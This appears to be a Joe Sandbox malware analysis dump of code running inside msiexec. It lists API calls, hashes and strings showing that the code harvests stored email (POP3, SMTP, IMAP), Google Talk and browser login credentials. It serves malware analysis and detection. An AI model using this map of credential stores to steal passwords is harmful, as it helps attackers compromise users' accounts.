                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$ByteCharMultiNameWidestrlen$ComputerEnumUser
                                                              • String ID: Software\Google\Google Talk\Accounts
                                                              • API String ID: 3996936265-1079885057
                                                              • Opcode ID: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                                              • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                                                              • Opcode Fuzzy Hash: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                                              • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 441 40ce70-40cea1 call 4023b2 call 401e69 446 40cea3-40cea6 441->446 447 40ceb8 441->447 448 40ceb2 446->448 449 40cea8-40ceb0 446->449 450 40cebd-40cecc _strcmpi 447->450 451 40ceb4-40ceb6 448->451 449->451 452 40ced3-40cedc call 40cdda 450->452 453 40cece-40ced1 450->453 451->450 454 40cede-40cef7 call 40c3d0 call 40ba28 452->454 458 40cf3f-40cf43 452->458 453->454 462 40cef9-40cefd 454->462 463 40cf0e 454->463 464 40cf0a-40cf0c 462->464 465 40ceff-40cf08 462->465 466 40cf13-40cf30 call 40affa 463->466 464->466 465->466 468 40cf35-40cf3a call 40c580 466->468 468->458
                                                              APIs
                                                                • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                                                • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                                                • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                                                • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                                                • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                                              • _strcmpi.MSVCRT ref: 0040CEC3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: strlen$_strcmpimemset
                                                              • String ID: /stext
                                                              • API String ID: 520177685-3817206916
                                                              • Opcode ID: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                              • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                                                              • Opcode Fuzzy Hash: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                              • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                                                              APIs
                                                                • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                              • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Library$AddressFreeLoadProc
                                                              • String ID:
                                                              • API String ID: 145871493-0
                                                              • Opcode ID: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                              • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                                                              • Opcode Fuzzy Hash: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                              • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                                                              APIs
                                                              • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                                                • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                                                • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                                                • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfile$StringWrite_itoamemset
                                                              • String ID:
                                                              • API String ID: 4165544737-0
                                                              • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                              • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                                                              • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                              • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                                                              APIs
                                                              • FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: FreeLibrary
                                                              • String ID:
                                                              • API String ID: 3664257935-0
                                                              • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                              • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                                                              • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                              • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                                                              APIs
                                                              • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040AEA3,00000000), ref: 00406D2C
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                              • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                                                              • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                              • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                                                              APIs
                                                              • FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: FreeLibrary
                                                              • String ID:
                                                              • API String ID: 3664257935-0
                                                              • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                              • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                                                              • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                              • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                                                              APIs
                                                              • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: CloseFind
                                                              • String ID:
                                                              • API String ID: 1863332320-0
                                                              • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                              • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                                                              • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                              • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                                                              APIs
                                                              • GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: AttributesFile
                                                              • String ID:
                                                              • API String ID: 3188754299-0
                                                              • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                              • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                                                              • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                              • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(advapi32.dll,?,00404A70,?,00404986,?,?,00000000,?,00000000,?), ref: 004047DA
                                                              • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004047EE
                                                              • GetProcAddress.KERNEL32(0045A9A8,CryptReleaseContext), ref: 004047FA
                                                              • GetProcAddress.KERNEL32(0045A9A8,CryptCreateHash), ref: 00404806
                                                              • GetProcAddress.KERNEL32(0045A9A8,CryptGetHashParam), ref: 00404812
                                                              • GetProcAddress.KERNEL32(0045A9A8,CryptHashData), ref: 0040481E
                                                              • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyHash), ref: 0040482A
                                                              • GetProcAddress.KERNEL32(0045A9A8,CryptDecrypt), ref: 00404836
                                                              • GetProcAddress.KERNEL32(0045A9A8,CryptDeriveKey), ref: 00404842
                                                              • GetProcAddress.KERNEL32(0045A9A8,CryptImportKey), ref: 0040484E
                                                              • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyKey), ref: 0040485A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$LibraryLoad
                                                              • String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
                                                              • API String ID: 2238633743-192783356
                                                              • Opcode ID: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                                              • Instruction ID: 70faa285c49fb169990c8fbe2f493e995bb0ef80ad344915aa685f594b7479e2
                                                              • Opcode Fuzzy Hash: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                                              • Instruction Fuzzy Hash: 1101C978E40744AEDB316F76CC09E06BEE1EF9C7047214D2EE1C153650D77AA011DE48
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfileString_mbscmpstrlen
                                                              • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                              • API String ID: 3963849919-1658304561
                                                              • Opcode ID: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                              • Instruction ID: 768c2722c01e59d080de5de3380f4e9b1c28328498c4b4a1784570bb69a0741a
                                                              • Opcode Fuzzy Hash: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                              • Instruction Fuzzy Hash: B2213371D0111C6ADB61EB51DC82FEE7B7C9B44705F0400EBBA08B2082DBBC6F898E59
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ??2@??3@memcpymemset
                                                              • String ID: (yE$(yE$(yE
                                                              • API String ID: 1865533344-362086290
                                                              • Opcode ID: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                                                              • Instruction ID: 81f979815271b6a149e92529059c9b1765a635985cdb271dadbae3a2bc10ddb4
                                                              • Opcode Fuzzy Hash: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                                                              • Instruction Fuzzy Hash: 2D117975900209EFDF119F94C804AAE3BB1FF08326F10806AFD556B2A1C7798915EF69
                                                              APIs
                                                                • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                                                                • Part of subcall function 00408934: CloseHandle.KERNEL32(?,?), ref: 0040899C
                                                                • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                                                              • memset.MSVCRT ref: 0040E5B8
                                                              • memset.MSVCRT ref: 0040E5CD
                                                              • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E634
                                                              • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E64A
                                                              • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E660
                                                              • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E676
                                                              • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E68C
                                                              • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E69F
                                                              • memset.MSVCRT ref: 0040E6B5
                                                              • memset.MSVCRT ref: 0040E6CC
                                                                • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                                                                • Part of subcall function 004066A3: memcmp.MSVCRT(?,00456EA0,00000010,?,?,000000FF), ref: 004066EE
                                                              • memset.MSVCRT ref: 0040E736
                                                              • memset.MSVCRT ref: 0040E74F
                                                              • sprintf.MSVCRT ref: 0040E76D
                                                              • sprintf.MSVCRT ref: 0040E788
                                                              • _strcmpi.MSVCRT ref: 0040E79E
                                                              • _strcmpi.MSVCRT ref: 0040E7B7
                                                              • _strcmpi.MSVCRT ref: 0040E7D3
                                                              • memset.MSVCRT ref: 0040E858
                                                              • sprintf.MSVCRT ref: 0040E873
                                                              • _strcmpi.MSVCRT ref: 0040E889
                                                              • _strcmpi.MSVCRT ref: 0040E8A5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                                              • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                                              • API String ID: 4171719235-3943159138
                                                              • Opcode ID: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                                                              • Instruction ID: e6e1aca5762f927b6bef3ecf047b01a22afe4fa283f9592a273acc07610826c1
                                                              • Opcode Fuzzy Hash: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                                                              • Instruction Fuzzy Hash: D6B152B2D04119AADF10EBA1DC41BDEB7B8EF04318F1444BBF548B7181EB39AA558F58
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                                                              • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                                                              • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                                                              • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                                                              • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                                                              • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                                                              • GetWindowRect.USER32(00000000,?), ref: 0041047C
                                                              • GetWindowRect.USER32(?,?), ref: 00410487
                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                                                              • GetDC.USER32 ref: 004104E2
                                                              • strlen.MSVCRT ref: 00410522
                                                              • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                                                              • ReleaseDC.USER32(?,?), ref: 00410580
                                                              • sprintf.MSVCRT ref: 00410640
                                                              • SetWindowTextA.USER32(?,?), ref: 00410654
                                                              • SetWindowTextA.USER32(?,00000000), ref: 00410672
                                                              • GetDlgItem.USER32(?,00000001), ref: 004106A8
                                                              • GetWindowRect.USER32(00000000,?), ref: 004106B8
                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                                                              • GetClientRect.USER32(?,?), ref: 004106DD
                                                              • GetWindowRect.USER32(?,?), ref: 004106E7
                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                                                              • GetClientRect.USER32(?,?), ref: 00410737
                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                              • String ID: %s:$EDIT$STATIC
                                                              • API String ID: 1703216249-3046471546
                                                              • Opcode ID: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                                                              • Instruction ID: 9785898008ba7037e97d6a181d6b2a38f1c87ee61eba0ca9b836c22844d1efbd
                                                              • Opcode Fuzzy Hash: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                                                              • Instruction Fuzzy Hash: 36B1DF75508341AFD750DFA8C985E6BBBE9FF88704F00492DF59982261DB75E804CF16
                                                              APIs
                                                              • memset.MSVCRT ref: 004024F5
                                                                • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                              • _mbscpy.MSVCRT(?,00000000,?,?,?,67CE7B60,?,00000000), ref: 00402533
                                                              • _mbscpy.MSVCRT(?,?), ref: 004025FD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _mbscpy$QueryValuememset
                                                              • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                              • API String ID: 168965057-606283353
                                                              • Opcode ID: db52dd6227f64e1606ed286d3875c760bf9a06f6856d1fddeb2df187246517b6
                                                              • Instruction ID: 7e64c7f7efb5926a908898138c7c80272d7c47f2ed846a803f17f87345e13469
                                                              • Opcode Fuzzy Hash: db52dd6227f64e1606ed286d3875c760bf9a06f6856d1fddeb2df187246517b6
                                                              • Instruction Fuzzy Hash: 0A5173B640221DABEF60DF91CC85ADD7BA8EF04318F54846BF908A7141D7BD9588CF98
                                                              APIs
                                                              • memset.MSVCRT ref: 00402869
                                                                • Part of subcall function 004029A2: RegQueryValueExA.ADVAPI32(00000400,?,00000000,?,?,?), ref: 004029D3
                                                              • _mbscpy.MSVCRT(?,?,67CE7B60,?,00000000), ref: 004028A3
                                                                • Part of subcall function 004029A2: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00402A01
                                                              • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,67CE7B60,?,00000000), ref: 0040297B
                                                                • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: QueryValue_mbscpy$ByteCharMultiWidememset
                                                              • String ID: Display Name$Email$HTTP$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$Password$SMTP$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                                                              • API String ID: 1497257669-167382505
                                                              • Opcode ID: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                                              • Instruction ID: 8a18399fb9ab4dbf3293ae90a7c33dbf32d2aa74b1f684e89f9c0cb2c5d46144
                                                              • Opcode Fuzzy Hash: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                                              • Instruction Fuzzy Hash: F1514CB190124DAFEF60EF61CD85ACD7BB8FF04308F14812BF92466191D7B999488F98
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                              • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                              • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                              • LoadCursorA.USER32(00000067), ref: 0040115F
                                                              • SetCursor.USER32(00000000,?,?), ref: 00401166
                                                              • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                              • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                              • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                              • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                              • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                              • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                              • EndDialog.USER32(?,00000001), ref: 0040121A
                                                              • DeleteObject.GDI32(?), ref: 00401226
                                                              • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                              • ShowWindow.USER32(00000000), ref: 00401253
                                                              • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                              • ShowWindow.USER32(00000000), ref: 00401262
                                                              • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                                              • memset.MSVCRT ref: 0040128E
                                                              • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                              • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                              • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                              • String ID:
                                                              • API String ID: 2998058495-0
                                                              • Opcode ID: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                                              • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                                                              • Opcode Fuzzy Hash: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                                              • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                                                              APIs
                                                              • memcmp.MSVCRT(?,file:,00000005,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 004425C8
                                                              • memcmp.MSVCRT(localhost,?,00000009,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442656
                                                              • memcmp.MSVCRT(vfs,00000001,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442800
                                                              • memcmp.MSVCRT(cache,00000001,00000005,00000000,00000000,BINARY), ref: 0044282C
                                                              • memcmp.MSVCRT(mode,00000001,00000004,00000000,00000000,BINARY), ref: 0044285E
                                                              • memcmp.MSVCRT(?,?,G+D,00000000,00000000,BINARY), ref: 004428A9
                                                              • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 0044293C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcmp$memcpy
                                                              • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                                              • API String ID: 231171946-2189169393
                                                              • Opcode ID: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                              • Instruction ID: 1e7ca99fc42d5c672073ce6a9752caade8d3c68442cd6653d693641e17a54130
                                                              • Opcode Fuzzy Hash: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                              • Instruction Fuzzy Hash: 30D13671904245ABFF248F68CA407EEBBB1AF15305F54406FF844A7341D3F89A86CB99
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _mbscat$memsetsprintf$_mbscpy
                                                              • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                              • API String ID: 633282248-1996832678
                                                              • Opcode ID: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                                              • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
                                                              • Opcode Fuzzy Hash: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                                              • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
                                                              APIs
                                                              • memset.MSVCRT ref: 00406782
                                                                • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
